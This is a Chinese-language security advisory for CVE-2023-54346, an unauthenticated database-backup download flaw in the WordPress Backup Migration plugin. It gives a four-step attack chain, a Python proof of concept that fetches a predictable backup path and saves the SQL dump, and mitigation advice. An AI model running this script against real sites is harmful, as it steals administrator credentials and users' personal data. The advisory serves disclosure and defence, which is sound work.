CVE-2023-54346 CVSS 7.5 高危

CVE-2023-54346: WordPress备份数据库信息泄露漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2023-54346

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Plugin Backup Migration

漏洞概述

WordPress插件Backup Migration 1.2.8版本存在严重的信息泄露漏洞。该插件在处理数据库备份文件时，由于使用了可预测的文件路径且缺乏访问控制，未经身份验证的远程攻击者无需用户交互即可枚举备份目录。攻击者能够直接构造URL下载包含完整数据库转储的敏感备份存档，导致站点所有敏感数据完全泄露。

技术细节

该漏洞的根本原因在于WordPress Backup Migration插件在1.2.8及更早版本中，对生成的数据库备份文件缺乏有效的访问控制机制。插件默认将备份文件存储在Web根目录下的特定文件夹中，且文件名通常包含可预测的时间戳或序列号。攻击者首先通过分析插件结构或访问公开的配置文件及日志，确定备份存储的具体目录路径。随后，利用已知的路径结构和命名模式，攻击者可以枚举并直接构造HTTP请求访问备份下载端点。由于该端点未进行身份验证校验（PR:N），任何网络攻击者均可遍历并下载完整的数据库备份文件（通常是.sql或.zip压缩包）。一旦获取备份文件，攻击者可离线解析数据库内容，获取管理员哈希凭证、用户个人身份信息（PII）及敏感业务数据，可能导致服务器被进一步完全接管。

攻击链分析

STEP 1

侦察

攻击者识别目标站点使用了WordPress及Backup Migration插件，并确认版本在1.2.8及以下。

STEP 2

路径枚举

攻击者访问插件配置文件或日志，获取备份文件存储的目录结构和命名规则。

STEP 3

构造攻击请求

基于获取的路径信息，攻击者构造指向特定备份文件的直接下载URL。

STEP 4

数据窃取

发送HTTP请求下载完整的数据库备份文件，并在本地解析以获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2023-54346 Proof of Concept
# This script attempts to download database backups from a vulnerable WordPress site.

def check_vulnerability(target_url):
    # Common predictable path for the vulnerable plugin
    # Attackers would need to enumerate the exact filename, often found in logs or config
    backup_url = f"{target_url}/wp-content/plugins/backup-backup/backups/backup_database.sql"
    
    print(f"[+] Checking target: {target_url}")
    print(f"[+] Attempting to download: {backup_url}")
    
    try:
        response = requests.get(backup_url, timeout=10)
        if response.status_code == 200:
            print("[!] SUCCESS: Backup file downloaded!")
            print(f"[!] File size: {len(response.content)} bytes")
            # Save the file
            with open("dumped_backup.sql", "wb") as f:
                f.write(response.content)
            print("[!] Saved as 'dumped_backup.sql'")
        else:
            print(f"[-] Failed. HTTP Status Code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <http://target_url>")
    else:
        check_vulnerability(sys.argv[1])

影响范围

Backup Migration <= 1.2.8

防御指南

临时缓解措施

建议立即将Backup Migration插件升级至最新修复版本。如果暂时无法升级，请禁用插件并删除服务器上所有已生成的备份文件。同时，应配置Web服务器（如Apache或Nginx）的规则，拒绝未经授权的对外部访问备份目录的请求，防止攻击者直接下载敏感数据。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表